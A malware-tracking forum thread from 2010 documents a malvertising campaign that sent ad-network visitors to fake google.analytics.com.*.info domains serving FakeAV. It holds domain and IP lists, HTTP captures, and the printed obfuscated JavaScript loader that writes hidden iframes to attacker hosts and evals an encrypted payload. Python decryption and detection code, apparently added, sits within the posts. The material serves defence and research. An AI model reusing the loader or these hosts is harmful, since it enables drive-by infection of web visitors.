Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on February 26, 2010, 05:12:30 pm

Title: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on February 26, 2010, 05:12:30 pm
Seeing quite a few clients hitting this host:

http://google.analytics.com.tklaxlxvedkt.info/

Directories are all over the place:
/kav/kav3%20.asp/
/kav/kav3.exe/
/kav/kav3.php/
/kavo/avorp1kav3%20.asp/
/kavo/avorp1kav3.py/
/kavs/kav6.php/
/nte/avorp1kav6.php/
/kav/kav3.py/
/kavs/kav6%20.asp/

Serving up PDFs, Java classes, and also FakeAV. The FakeAV is being downloaded with the Java user agent after the malicious classes that are served up finish executing.

FakeAV binary location:
google.analytics.com.tklaxlxvedkt.info/kav/kav3.php/eHc8d7c382V0100f070006R8db29656102T8351602d201l0409K71925c29303J030006010

VirusTotal.com Report:
http://www.virustotal.com/analisis/fa1df643d780e7f13b35981283940c4e2b5d3f053706ab03be90fc2a38bd9d7e-1267199064
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: SysAdMini on February 26, 2010, 05:29:09 pm
It is a NeoSploit exploit kit and distributes fake av.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on February 26, 2010, 07:51:24 pm
Found a bunch more:

google.analytics.com.jklnznqvztu.info
google.analytics.com.tluaweyermg.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.zugponkeqtzz.info

All resolve to the same IP:

75.125.183.50
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 06:33:03 pm
More:

google.analytics.com.hzlyaejcvmat.info - 69.174.245.150
google.analytics.com.lsvoenxxyya.info - 69.174.245.148
google.analytics.com.dbvvwrkgycfa.info - 69.174.245.147
google.analytics.com.yfguydudorip.info - 69.174.245.147
google.analytics.com.dcghkoixsagu.info - 72.51.41.155
google.analytics.com.gopbaqvgprvh.info - 72.51.41.155
google.analytics.com.dygpcewrjnw.info - 69.174.245.147
google.analytics.com.inxvwrxogrc.info - 69.174.245.150
google.analytics.com.kijksoeohxze.info -  72.51.41.155
google.analytics.com.prtrkmxkpctw.info - 75.125.183.50



Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 09:45:05 pm
Total found so far again:


google.analytics.com.byuigracdnjj.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zugponkeqtzz.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 11:30:10 pm
This seems to be pretty widespread. The list of referrers is pretty extensive; it looks like some advertising services did some business with some unsavory characters again.


Some of the referring domains to the collection of malicious google.analytics.*.info domains:

Code:
ad.doubleclick.net
ad.yieldmanager.com
articles.moneycentral.msn.com
astrocenter.astrology.msn.com
autos.kosmix.com
autos.msn.com
blogs2.startribune.com
boards.msn.com
community.foxsports.com
creative.adonion.com
creative.clicksor.com
cyclops.prod.untd.com
data.cnbc.com
digg.com
eb.adbureau.net
entertainment.msn.com
environment-msnbc.newsvine.com
fordtruckworld.tenmagazines.com
gasbuddy.com
health.msn.com
integration.mtvnservices.com
lifestyle.msn.com
local.msn.com
mbd.scout.com
media.bannerimg.com
media.www.gwhatchet.com
moneycentral.msn.com
msn.careerbuilder.com
msn.foxsports.com
music.msn.com
my.juno.com
my.msn.com
nbcsports.newsvine.com
pd.startribune.com
player.jambovideonetwork.com
pr1.shoe-metro.us
profootball.scout.com
rad.msn.com
realestate.msn.com
ro-d.redorbit.com
secret5trading.com
showbiz411.blogs.thr.com
splashpage.mtv.com
tag.admeld.com
tennessee.scout.com
tv.msn.com
video.bobvila.com
view.atdmt.com
weather.msn.com
wonderwall.msn.com
worldblog.msnbc.msn.com
www.bobvila.com
www.business.com
www.buy.com
www.cheboygannews.com
www.cnbc.com
www.delish.com
www.evite.com
www.greatschools.org
www.heatvisionblog.com
www.hollywoodreporter.com
www.kob.com
www.legacy.com
www.merriam-webster.com
www.msnbc.msn.com
www.paperbackswap.com
www.redorbit.com
www.retrevo.com
www.soapcentral.com
www.startribune.com
www.thebluebanner.net
www.thelantern.com
www.theobr.com
www.thrfeed.com
www.tvland.com
www.upi.com
www.wunderground.com
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 02, 2010, 04:58:08 pm
Two more:

google.analytics.com.uentfkblzpxx.info
google.analytics.com.uwbhpcrydgta.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 03, 2010, 05:19:10 pm
Turned a bunch of info over to some experts and they are tracking down the malvertising and trying to identify the affiliates. This was described as a "nest o' badness" and I do not think that is an understatement. Hopefully I will have a larger list of domains/IPs contributing to this.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 03, 2010, 07:11:02 pm
deleted
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 04, 2010, 10:01:18 pm
After conversations with US-CERT, they will be publishing an alert about this tomorrow/Monday.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 07, 2010, 08:02:11 am
So I finally found the javascript causing the requests to go to the google.analytics.com.*.info domains. It appears that javascript coming back from adrotator.mediaplex.feed-mnptr.com had encoded+obfuscated+encrypted javascript that redirects people to the google.analytics.com.*.info domains.

Here is the portion of the malicious javascript that it was serving up previously:
Code:
var RSA={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},decrypt:function(c,d,n){c=this.strhex(c);var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}return result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var 
ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:133,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:142,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:151,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.charAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabet.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=this.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}return output}}


statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var cd1 = "adr";
var cd2 = "otator.m";
var cd3 = "ediaplex.feed-mnptr.com";
var cur_domain = cd1 + cd2 + cd3;
       var all_t = "1,2,3,4,5,6,7,8,9";
       var mtch = all_t.match(statictml);
if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=260233594&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
                              
//
var jse1 = "htt"; var jse2 = "p://adr"; var jse3 = "otator.mediaple"; var jse4 = "x.feed-mnptr.com/stats_js_e.php?id=260233594";
var jse = jse1 + jse2 + jse3 + jse4;
document.write(unescape("%3Ciframe src='" + jse + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//


eval(RSA.decrypt('1c8e162194ee9b0fc499a16b2e423b376922958cda38cd50234229fa051a0742ecf1c22b4894d2e1526c13d66570af6256039b11934eaaa6292067d2e092b70a18b1f21422f606dd839108925e32edb3c316a1d7242708a29c620325137ca2170bc4003a6072c3fdbf2da9fd729c5fcd0af3295172a40d353fef13d30c2e044bc912eb149614207741efaa850d799412b990931f3efba394928b1aa73c32c4712c25f77662aec8d22a2da282879a040aa84f20f3083c2d7b4d30a7e0b52e1a1e22b00afd0e914113ccbe4d0c5bfa31568b7317633401ba627919dde2e066c9ea1d7147f0a9b7f813693ac31330201dd064925c196902237f21708460182ccd8113e527','14947943','64253471'));

}

All of this javascript just causes the following to get written into the document:

Code:
<iframe width="1" height="1" style="visibility: hidden;" src="http://google.analytics.com.hzlyaejcvmat[dot]info/ld/kav2/"></iframe>

The registration stuff on feed-mnptr.com seems suspect:

Domain name: feed-mnptr.com

Registrant Contact:
   ReligionSeeke
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Administrative Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Technical Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Billing Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

DNS:
free01.editdns.net
free02.editdns.net

Created: 2010-01-30
Expires: 2011-01-30

Something very fishy is going on...
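The script quoted in the post above hides its real payload behind a small custom "RSA" routine and only hands the result to eval(); the statictml check in front of it gates on the visitor's UTC offset, so only some time zones ever reach the eval() branch. The Python below is an added example, not code from the thread or from the script's author: it re-implements the encrypt and decrypt steps of that routine (7-hex-digit blocks, c^d mod n, framing digits stripped, digit pairs +30, base64) so an analyst can recover the hidden JavaScript statically by calling toy_rsa_decrypt on a captured ciphertext, d and n instead of letting a browser execute it. The key pair (P, Q, E, D, N) is constructed for the round-trip demonstration and is not the d/n pair embedded in the sample; Python 3.8+ is assumed for pow(e, -1, phi). Payloads are treated as ASCII/Latin-1, so the cp1251 translation table in the sample is not reproduced.

```python
import base64

# Constructed toy key: two small primes, far too small for real RSA, chosen only so the
# modulus N exceeds the largest framed block (19292921) and still fits in 7 hex digits.
P, Q = 4999, 5003
N = P * Q                              # 25009997
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # modular inverse of E mod phi(N)


def _chunks(text: str, size: int):
    """Split text into consecutive pieces of the given size (last one may be shorter)."""
    return [text[i:i + size] for i in range(0, len(text), size)]


def toy_rsa_encrypt(message: str, e: int, n: int) -> str:
    """Mirror of RSA.encrypt from the sample: base64 the message, take three characters
    at a time, write each as (ord - 30) in two decimal digits, frame the group as
    '1...1', raise it to e mod n and emit the result as 7-digit zero-padded hex."""
    b64 = base64.b64encode(message.encode("latin-1")).decode("ascii")
    blocks = []
    for group in _chunks(b64, 3):
        # every base64 alphabet character gives a two-digit value (13..92)
        digits = "1" + "".join(f"{ord(ch) - 30:02d}" for ch in group) + "1"
        m = int(digits)
        if m >= n:
            raise ValueError("framed block is not smaller than the modulus")
        blocks.append(f"{pow(m, e, n):07x}")
    return "".join(blocks)


def toy_rsa_decrypt(ciphertext: str, d: int, n: int) -> str:
    """Mirror of RSA.decrypt from the sample, i.e. what eval() in the script receives:
    7-hex-digit blocks -> c^d mod n -> drop the leading and trailing framing '1' ->
    each pair of decimal digits + 30 is one base64 character -> base64 decode."""
    decimal = ""
    for block in _chunks(ciphertext, 7):
        if not block:
            continue
        m = str(pow(int(block, 16), d, n))
        decimal += m[1:-1]                      # strip the framing digits
    b64 = "".join(chr(int(pair, 10) + 30) for pair in _chunks(decimal, 2))
    return base64.b64decode(b64).decode("latin-1")


def round_trip(message: str) -> bool:
    """Encrypt with the constructed public key and decrypt with the private key."""
    return toy_rsa_decrypt(toy_rsa_encrypt(message, E, N), D, N) == message


if __name__ == "__main__":
    # Constructed stand-in for a hidden payload; an analyst would instead pass the
    # ciphertext, d and n quoted in a captured script to toy_rsa_decrypt.
    sample = "document.write('<iframe src=\"http://EXAMPLE.invalid/\"></iframe>')"
    ct = toy_rsa_encrypt(sample, E, N)
    print("ciphertext:", ct)
    print("recovered :", toy_rsa_decrypt(ct, D, N))
```

Because decryption is pure arithmetic, the recovered string can be inspected or logged without ever being evaluated; anything the script would have written into the document shows up as plain text.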



Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: jboyhb on March 24, 2010, 02:03:10 pm
More:

IP: 66.135.41.32

google.analytics(dot)com.mdmnegsxcytq.info/kav/kav5.php
google.analytics(dot)com.mdmnegsxcytq.info/kav/KAV5.py/oH5100219cV0100f036002R22c9ccec102T1aaa3015Q000002fa901801F0016000aJ11000601l0409K5b577271317

Wepawet:
benign

jsunpack:
Malicious
http://jsunpack.eyeprotectiongroup.com/dec/go?report=9b1a7c8123b3f0fa1a4225b6150fb7ca55c15823

Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: mwollenweber on March 25, 2010, 11:12:42 pm
Does anyone have a sample of the PDF? It seems like the kav executable is after successful exploitation by the PDF. However, I have a Mac that downloaded the executable but I can't find the PDF on disk (yet). Has anyone seen it work on OS X? And if you have a sample please let me know. Thanks.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on April 30, 2010, 04:35:52 pm
Yahoo! is still doing business with some of these people apparently.

Request:
Code:
GET /cust.php?n=cust3 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/m
sword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xba
p, application/x-ms-application, */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdANplCgCfIksAAAAAAB-FFAAAAAAAAgAEA
AYAAAAAAP8AAAAGC1RkEgAAAAAAHZ0KAAAAAABvxxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAHYgUAAAAAAAIAAwAAAAAAH4XrUbge3T8fhetRuB7dPx-F61G4Ht0.H4XrUbg
e3T8AAAAAAADwPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO5nMQqMkjCOVE
-tNHXz8ZdCqW3h6dqVv9AKFTAAAAAA==,http%3A%2F%2Fd.tradex.openx.com%2Fck.php%3Foapar
ams%3D2__bannerid%3D2643__zoneid%3D1829__cb%3Da0101f785d__r_id%3D38f962825de0b640
a8012aa1fa0e632f__r_ts%3Dl1p0rs__oadest%3D%24,http%3A%2F%2Fd.tradex.openx.com%2Fa
fr.php%3Frefresh%3D45%26zoneid%3D1829%26cb%3Dinsert_random_number_here%26loc%3Dht
tp%253a%252f%252fd.tradex.openx.com%252fafr.php%253fzoneid%253d1826%2526cb%253din
sert_random_number_here,Z%3D728x90%26x%3Dhttp%253A%252F%252Fd%252Etradex%252Eopen
x%252Ecom%252Fck%252Ephp%253Foaparams%253D2%255F%255Fbannerid%253D2643%255F%255Fz
oneid%253D1829%255F%255Fcb%253Da0101f785d%255F%255Fr%255Fid%253D38f962825de0b640a
8012aa1fa0e632f%255F%255Fr%255Fts%253Dl1p0rs%255F%255Foadest%253D%24%26s%3D681434
%26_salt%3D237608200%26B%3D10%26u%3Dhttp%253A%252F%252Fd.tradex.openx.com%252Fafr
.php%253Frefresh%253D45%2526zoneid%253D1829%2526cb%253DINSERT_RANDOM_NUMBER_HERE%
2526loc%253Dhttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Fzonei
d%25253D1826%252526cb%25253DINSERT_RANDOM_NUMBER_HERE%26r%3D0,5372d202-5462-11df-
80ae-001e6849f50f
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: sefito.com
Connection: Keep-Alive

Response:
Code:
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 30 Apr 2010 14:11:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 158
<html>
<body>

<iframe src="http://google.analytics.com.uwyovhxythol.info/ld/kav4/" style="visib
ility:hidden;" width="1" height="1"></iframe>

</body>
</html>

Looks like they are adding intermediary domains between the two now sometimes. This is not nearly as widespread as before, but still wayyyyy too many people use Yieldmanager's advertising service and are potentially infecting their clients. Google too, via DoubleClick.net:

Code:
GET /ld/kav4/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.m
s-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms
-powerpoint, application/msword, */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-425659629246
7410&output=html&h=90&slotname=3697413835&w=728&ea=0&flash=10.0.32.18&url=http%3A
%2F%2Fwww.sparkpeople.com%2Fresource%2Fgames_trivia.asp&dt=1272580330993&shv=r201
00414&correlator=1272580330993&frm=1&ga_vid=714073391.1263411881&ga_sid=127258007
9&ga_hid=2005532139&ga_fc=1&u_tz=-360&u_his=36&u_java=0&u_h=1050&u_w=1680&u_ah=10
00&u_aw=1680&u_cd=32&u_nplug=0&u_nmime=0&biw=814&bih=779&ifk=1157504475&fu=4&ifi=
1&dtd=78
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; MS-R
TC LM 8)
Host: google.analytics.com.vdifjlhzgas.info
Connection: Keep-Alive


domains to add to the list:
sefito.com - redirects to malvertising hosts.

google.analytics.com.aojegqdnwjvj.info
google.analytics.com.arffzejadvl.info
google.analytics.com.atdvtodlubs.info
google.analytics.com.fhccvgjohscc.info
google.analytics.com.ggfinekjvfmg.info
google.analytics.com.gijiinhivudu.info
google.analytics.com.ltxmklkxkuh.info
google.analytics.com.meejnagyeuzi.info
google.analytics.com.rqpqgqyjlmex.info
google.analytics.com.scvepuxdfzar.info
google.analytics.com.tbuygryyutcj.info
google.analytics.com.uwyovhxythol.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.waolovbichmz.info
google.analytics.com.zfnefclseth.info

All have resolved to 67.18.213.122 for over the last week.
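Every landing host in this thread has the same shape, google.analytics.com.<random label>.info, and the captures above show which ad-network referrer led each client there. The Python below is an added example, not code from the thread: it parses raw HTTP requests of the kind quoted above, flags hosts that match that impersonation pattern (plus the /kav-style landing paths and the sefito.com redirector named in the thread), and groups the hits by referring site so the ad-network path can be reported. The sample requests are constructed and modelled on the captures; the ca-pub value and the yieldmanager query string are placeholders.

```python
import re
from urllib.parse import urlsplit

# Detection pattern (constructed for this example): brand-impersonating hostnames of
# the form google.analytics.com.<label>.info, as used by every landing host in the thread.
IMPERSONATING_HOST = re.compile(r"^google\.analytics\.com\.[a-z0-9-]+\.info$", re.I)
# Landing-page path prefixes seen on those hosts in the thread (/kav/, /kavs/, /ld/kav4/ ...).
SUSPECT_PATH = re.compile(r"^/(?:ld/)?kav", re.I)
# Intermediary hop named in the thread as redirecting to the malvertising hosts.
KNOWN_REDIRECTORS = {"sefito.com"}


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request (request line plus headers) into a dict.
    Header names are lower-cased; a malformed request line raises ValueError."""
    lines = raw.strip().splitlines()
    parts = lines[0].split()
    if len(parts) != 3:
        raise ValueError("bad request line: %r" % lines[0])
    req = {"method": parts[0], "path": parts[1], "version": parts[2], "headers": {}}
    for line in lines[1:]:
        if not line.strip():
            break                                # blank line ends the headers
        name, _, value = line.partition(":")     # split on the first colon only
        req["headers"][name.strip().lower()] = value.strip()
    return req


def classify(raw: str):
    """Return (verdict, host, referring_site) for one captured request."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", "").split(":")[0].lower()
    ref_site = urlsplit(req["headers"].get("referer", "")).hostname or ""
    if IMPERSONATING_HOST.match(host):
        verdict = "malvertising-landing" if SUSPECT_PATH.match(req["path"]) else "impersonating-host"
    elif host in KNOWN_REDIRECTORS:
        verdict = "known-redirector"
    else:
        verdict = "clean"
    return verdict, host, ref_site


def referrer_report(requests):
    """Group every non-clean request by the site that referred the client to it."""
    report = {}
    for raw in requests:
        verdict, host, ref = classify(raw)
        if verdict != "clean":
            report.setdefault(ref or "(no referrer)", set()).add(host)
    return report


# Constructed sample traffic, modelled on the captures quoted in the thread.
SAMPLE_REQUESTS = [
    "\r\n".join([
        "GET /ld/kav4/ HTTP/1.1",
        "Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-EXAMPLE&output=html",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Host: google.analytics.com.vdifjlhzgas.info",
        "Connection: Keep-Alive", "", "",
    ]),
    "\r\n".join([
        "GET /cust.php?n=cust3 HTTP/1.1",
        "Referer: http://ad.yieldmanager.com/iframe3?PLACEHOLDER",
        "Host: sefito.com", "", "",
    ]),
    "\r\n".join(["GET /index.html HTTP/1.1", "Host: www.example.com", "", ""]),
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
    for ref, hosts in referrer_report(SAMPLE_REQUESTS).items():
        print(ref, "->", sorted(hosts))
```

The same two regular expressions drop straight into a proxy-log or DNS-log search; the referrer grouping is what turns a pile of flagged requests into the list of ad networks worth contacting.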
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on May 03, 2010, 02:34:11 pm
More on 67.18.213.122 :

google.analytics.com.pswdypsaxtqh.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.sxyayfphgqfo.info
google.analytics.com.mpmygrdjymz.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on May 04, 2010, 09:05:01 pm
173.236.39.122

google.analytics.com.wcgzxcdbineo.info